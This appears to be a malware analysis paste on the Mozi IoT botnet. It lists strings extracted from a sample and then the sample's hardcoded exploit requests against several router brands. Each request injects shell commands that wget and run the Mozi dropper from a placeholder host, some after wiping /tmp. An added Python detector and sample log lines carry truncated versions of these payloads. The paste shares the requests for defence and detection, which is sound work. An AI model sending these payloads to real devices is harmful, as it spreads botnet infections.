  578. 0x0003606c No child processes
  579. 0x0003607f Resource temporarily unavailable
  580. 0x000360a0 Cannot allocate memory
  581. 0x000360b7 Permission denied
  582. 0x000360c9 Bad address
  583. 0x000360d5 Block device required
  584. 0x000360eb Device or resource busy
  585. 0x00036103 File exists
  586. 0x0003610f Invalid cross-device link
  587. 0x00036129 No such device
  588. 0x00036138 Not a directory
  589. 0x00036148 Is a directory
  590. 0x00036157 Invalid argument
  591. 0x00036168 Too many open files in system
  592. 0x00036186 Too many open files
  593. 0x0003619a Inappropriate ioctl for device
  594. 0x000361b9 Text file busy
  595. 0x000361c8 File too large
  596. 0x000361d7 No space left on device
  597. 0x000361ef Illegal seek
  598. 0x000361fc Read-only file system
  599. 0x00036212 Too many links
  600. 0x00036221 Broken pipe
  601. 0x0003622d Numerical argument out of domain
  602. 0x0003624e Numerical result out of range
  603. 0x0003626c Resource deadlock avoided
  604. 0x00036286 File name too long
  605. 0x00036299 No locks available
  606. 0x000362ac Function not implemented
  607. 0x000362c5 Directory not empty
  608. 0x000362d9 Too many levels of symbolic links
  609. 0x000362fc No message of desired type
  610. 0x00036317 Identifier removed
  611. 0x0003632a Channel number out of range
  612. 0x00036346 Level 2 not synchronized
  613. 0x0003635f Level 3 halted
  614. 0x0003636e Level 3 reset
  615. 0x0003637c Link number out of range
  616. 0x00036395 Protocol driver not attached
  617. 0x000363b2 No CSI structure available
  618. 0x000363cd Level 2 halted
  619. 0x000363dc Invalid exchange
  620. 0x000363ed Invalid request descriptor
  621. 0x00036408 Exchange full
  622. 0x00036416 No anode
  623. 0x0003641f Invalid request code
  624. 0x00036434 Invalid slot
  625. 0x00036442 Bad font file format
  626. 0x00036457 Device not a stream
  627. 0x0003646b No data available
  628. 0x0003647d Timer expired
  629. 0x0003648b Out of streams resources
  630. 0x000364a4 Machine is not on the network
  631. 0x000364c2 Package not installed
  632. 0x000364d8 Object is remote
  633. 0x000364e9 Link has been severed
  634. 0x000364ff Advertise error
  635. 0x0003650f Srmount error
  636. 0x0003651d Communication error on send
  637. 0x00036539 Protocol error
  638. 0x00036548 Multihop attempted
  639. 0x0003655b RFS specific error
  640. 0x0003656e Bad message
  641. 0x0003657a Value too large for defined data type
  642. 0x000365a0 Name not unique on network
  643. 0x000365bb File descriptor in bad state
  644. 0x000365d8 Remote address changed
  645. 0x000365ef Can not access a needed shared library
  646. 0x00036616 Accessing a corrupted shared library
  647. 0x0003663b .lib section in a.out corrupted
  648. 0x0003665b Attempting to link in too many shared libraries
  649. 0x0003668b Cannot exec a shared library directly
  650. 0x000366b1 Invalid or incomplete multibyte or wide character
  651. 0x000366e3 Interrupted system call should be restarted
  652. 0x0003670f Streams pipe error
  653. 0x00036722 Too many users
  654. 0x00036731 Socket operation on non-socket
  655. 0x00036750 Destination address required
  656. 0x0003676d Message too long
  657. 0x0003677e Protocol wrong type for socket
  658. 0x0003679d Protocol not available
  659. 0x000367b4 Protocol not supported
  660. 0x000367cb Socket type not supported
  661. 0x000367e5 Operation not supported
  662. 0x000367fd Protocol family not supported
  663. 0x0003681b Address family not supported by protocol
  664. 0x00036844 Address already in use
  665. 0x0003685b Cannot assign requested address
  666. 0x0003687b Network is down
  667. 0x0003688b Network is unreachable
  668. 0x000368a2 Network dropped connection on reset
  669. 0x000368c6 Software caused connection abort
  670. 0x000368e7 Connection reset by peer
  671. 0x00036900 No buffer space available
  672. 0x0003691a Transport endpoint is already connected
  673. 0x00036942 Transport endpoint is not connected
  674. 0x00036966 Cannot send after transport endpoint shutdown
  675. 0x00036994 Too many references: cannot splice
  676. 0x000369b7 Connection timed out
  677. 0x000369cc Connection refused
  678. 0x000369df Host is down
  679. 0x000369ec No route to host
  680. 0x000369fd Operation already in progress
  681. 0x00036a1b Operation now in progress
  682. 0x00036a35 Stale NFS file handle
  683. 0x00036a4b Structure needs cleaning
  684. 0x00036a64 Not a XENIX named type file
  685. 0x00036a80 No XENIX semaphores available
  686. 0x00036a9e Is a named type file
  687. 0x00036ab3 Remote I/O error
  688. 0x00036ac4 Disk quota exceeded
  689. 0x00036ad8 No medium found
  690. 0x00036ae8 Wrong medium type
  691. 0x00036afa File locking deadlock error
  692. 0x00036b64 0123456789abcdef
  693. 0x00036bb0 %u.%u.%u.%u.in-addr.arpa
  694. 0x00036bcc %x.%x.
  695. 0x00036bd4 ip6.arpa
  696. 0x00036e70 /dev/null
  697. 0x0003728f \a\b\t\n\v\f\r
  698. 0x000372c1  !#$%&`()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~
  699. 0x00037534 hlLjztq
  700. 0x00037548 npxXoudifFeEgGaACSncs[
  701. 0x00037587 \n\n\n\n\n\n\n\n
  702. 0x00037590 (nil)
  703. 0x0003759b nfinity
  704. 0x000375cf \b/etc/services
  705. 0x000375ec /etc/resolv.conf
  706. 0x00037600 /etc/config/resolv.conf
  707. 0x00037618 nameserver
  708. 0x00037624 domain
  709. 0x0003762c search
  710. 0x00037645 \ninfinity
  711. 0x00037660 /etc/hosts
  712. 0x0003766c /etc/config/hosts
  713.  
  714. (2) Attack requests hardcoded in Mozi to exploit vulnerable devices:
  715.  
  716. 0x000008d8 POST /GponForm/diag_Form?images/ HTTP/1.1\r\nHost: 127.0.0.1:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: Hello, World\r\nContent-Length: 118\r\n\r\nXWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://%s:%d/Mozi.m+-O+->/tmp/gpon8080;sh+/tmp/gpon8080&ipv=0
  717.  
  718.  
  719. 0x000010ec POST /GponForm/diag_Form?images/ HTTP/1.1\r\nHost: 127.0.0.1:80\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: Hello, World\r\nContent-Length: 118\r\n\r\nXWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://%s:%d/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0
  720.  
  721. 0x00001902 POST /picsdesc.xml HTTP/1.1\r\nContent-Length: 630\r\nAccept-Encoding: gzip, deflate\r\nSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\r\nAccept: /\r\nUser-Agent: Hello-World\r\nConnection: keep-alive\r\n\r\n<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope//" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>cd /var/; wget http://%s:%d/Mozi.m; chmod +x Mozi.m; ./Mozi.m</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>\r\n\r\n
  722.  
  723. 0x00002114 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://%s:%d/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0\r\n\r\n
  724.  
  725.  
  726. 0x0000313c POST /ctrlt/DeviceUpgrade_1 HTTP/1.1\r\nHost: %s:37215\r\nContent-Length: 601\r\nConnection: keep-alive\r\nAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"\r\n\r\n<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g %s:%d -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)/NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
  727.  
  728.  
  729. 0x00003950 POST /UD/act?1 HTTP/1.1\r\nHost: 127.0.0.1:7574\r\nUser-Agent: Hello, world\r\nSOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers\r\nContent-Type: text/xml\r\nContent-Length: 640\r\n\r\n<?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://%s:%d/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>
  730.  
  731.  
  732. 0x00004164 POST /UD/act?1 HTTP/1.1\r\nHost: 127.0.0.1:5555\r\nUser-Agent: Hello, world\r\nSOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers\r\nContent-Type: text/xml\r\nContent-Length: 640\r\n\r\n<?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://%s:%d/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>
  733.  
  734.  
  735. 0x00004978 POST /HNAP1/ HTTP/1.0\r\nHost: %s:80\r\nContent-Type: text/xml; charset="utf-8"\r\nSOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://%s:%d/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`\r\nContent-Length: 640\r\n\r\n<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>\r\n\r\n
  736.  
  737.  
  738. 0x0000518c GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://%s:%d/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0\r\n\r\n
  739. 0x000059a0 GET /shell?cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1\r\nUser-Agent: Hello, world\r\nHost: %s:80\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nConnection: keep-alive\r\n\r\n
  740.  
  741.  
  742. 0x000061b4 POST /soap.cgi?service=WANIPConn1 HTTP/1.1\r\nHost: %s:49152\r\nContent-Length: 630\r\nAccept-Encoding: gzip, deflate\r\nSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\r\nAccept: */*\r\nUser-Agent: Hello, World\r\nConnection: keep-alive\r\n\r\n<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1"><NewPortMappingDescription><NewPortMappingDescription><NewLeaseDuration></NewLeaseDuration><NewInternalClient>`cd /tmp;rm -rf *;wget http://%s:%d/Mozi.m;/tmp/Mozi.m dlink`</NewInternalClient><NewEnabled>1</NewEnabled><NewExternalPort>634</NewExternalPort><NewRemoteHost></NewRemoteHost><NewProtocol>TCP</NewProtocol><NewInternalPort>45</NewInternalPort></m:AddPortMapping><SOAPENV:Body><SOAPENV:envelope>\r\n\r\n
  743.  
  744.  
  745. 0x000069c8 GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://%s:%d/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.m
  746. 0x000071dc GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcron
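
The hardcoded requests above all share a small set of target paths and payload markers (the `Mozi.m` / `Mozi.a` dropper names, `${IFS}` shell injection, an inline `wget`). The following detector is an added example written for this page, not MalwareMustDie's code or the sample's: it derives match signatures from the request lines listed above, scores constructed HTTP request samples (addresses from the documentation ranges, payloads truncated) and pulls the dropper URL out of a hit for blocklisting. Signature names and the scoring rule are this example's own choices.

```python
import re
from typing import Dict, List

# Target signatures derived from the request lines hardcoded in the sample.
# Each regex runs over the raw request text (request line plus headers).
TARGET_SIGNATURES = [
    ("upnp-picsdesc-addportmapping", re.compile(r"POST /picsdesc\.xml .*AddPortMapping", re.S)),
    ("netgear-setup-cgi-syscmd", re.compile(r"GET /setup\.cgi\?[^ ]*todo=syscmd")),
    ("huawei-deviceupgrade", re.compile(r"POST /ctrlt/DeviceUpgrade_1 ")),
    ("tr064-setntpservers", re.compile(r"POST /UD/act\?1 .*SetNTPServers", re.S)),
    ("hnap1-soapaction-cmd", re.compile(r"POST /HNAP1/ .*SOAPAction: http://purenetworks\.com/HNAP1/`", re.S)),
    ("language-swedish-ifs", re.compile(r"GET /language/Swedish\$\{IFS\}")),
    ("shell-endpoint-cmd", re.compile(r"GET /shell\?cd\+/tmp")),
    ("soap-cgi-wanipconn1", re.compile(r"POST /soap\.cgi\?service=WANIPConn1 ")),
    ("cgi-bin-ifs", re.compile(r"GET /cgi-bin/;cd\$\{IFS\}")),
    ("board-cgi-cmd", re.compile(r"GET /board\.cgi\?cmd=")),
]

# Payload markers shared by the requests above. The wget check is deliberately
# case-sensitive so a legitimate "User-Agent: Wget/..." does not trip it.
PAYLOAD_MARKERS = [
    ("mozi-dropper-name", re.compile(r"Mozi\.[am]\b")),
    ("ifs-shell-injection", re.compile(r"\$\{IFS\}")),
    ("wget-in-request", re.compile(r"\bwget\b")),
]

# Dropper URL as it appears in the payloads: http://<host>:<port>/Mozi.m or /Mozi.a.
# The character class stops at the separators the payloads use around the URL.
DROPPER_URL = re.compile(r"https?://[^\s;`'\"<>&+]+/Mozi\.[am]")


def classify_request(raw: str) -> Dict[str, object]:
    """Tag one raw HTTP request with the target paths and payload markers it hits."""
    targets = [tag for tag, rx in TARGET_SIGNATURES if rx.search(raw)]
    markers = [tag for tag, rx in PAYLOAD_MARKERS if rx.search(raw)]
    # A known target path plus a payload marker is treated as a confirmed attempt;
    # either one alone is only worth a look (a plain TR-064 probe, a stray "wget").
    if targets and markers:
        verdict = "mozi-exploit-attempt"
    elif targets or markers:
        verdict = "suspicious"
    else:
        verdict = "benign"
    return {"verdict": verdict, "targets": targets, "markers": markers}


def extract_dropper_urls(raw: str) -> List[str]:
    """Return the Mozi dropper URLs embedded in a request, for a blocklist feed."""
    return DROPPER_URL.findall(raw)


def scan_requests(requests: List[str]) -> List[Dict[str, object]]:
    """Classify a batch of raw requests, keeping the index for correlation."""
    results = []
    for idx, raw in enumerate(requests):
        result = classify_request(raw)
        result["index"] = idx
        result["dropper_urls"] = extract_dropper_urls(raw)
        results.append(result)
    return results


# Constructed sample requests (documentation addresses, payloads cut short).
# They are stand-ins for what a web-server or honeypot log would hold.
SAMPLE_REQUESTS = [
    "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://203.0.113.5:7777/Mozi.m+-O+/tmp/netgear&curpath=/ HTTP/1.0",
    "POST /HNAP1/ HTTP/1.0\r\nHost: 192.0.2.1:80\r\nSOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && wget http://203.0.113.5:7777/Mozi.m`",
    "GET /index.html HTTP/1.1\r\nHost: 192.0.2.1",
    "GET /cgi-bin/;cd${IFS}/var/tmp;wget${IFS}http://203.0.113.5:7777/Mozi.m HTTP/1.1",
    "POST /UD/act?1 HTTP/1.1\r\nHost: 127.0.0.1:7574\r\nSOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers",
    "GET /robots.txt HTTP/1.1\r\nUser-Agent: Wget/1.20",
]

if __name__ == "__main__":
    for r in scan_requests(SAMPLE_REQUESTS):
        print(r["index"], r["verdict"], r["targets"], r["markers"], r["dropper_urls"])
```

The fifth sample shows why the two-tier rule exists: a bare `SetNTPServers` SOAP call to `/UD/act?1` is the TR-064 entry point these payloads use, but without a dropper marker it is only flagged for review rather than as a confirmed hit. The dropper URLs the scanner returns (`host:port` of the `%s:%d` placeholder in the original strings) are what you would feed to an egress blocklist.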
  747.  
  748. ---
  749. This information is shared to prevent further spread of this infection.
  750. The offensive codes have been jinxed (modified) to avoid copy-paste recycling.
  751. @unixfreaxjp - malwaremustdie.org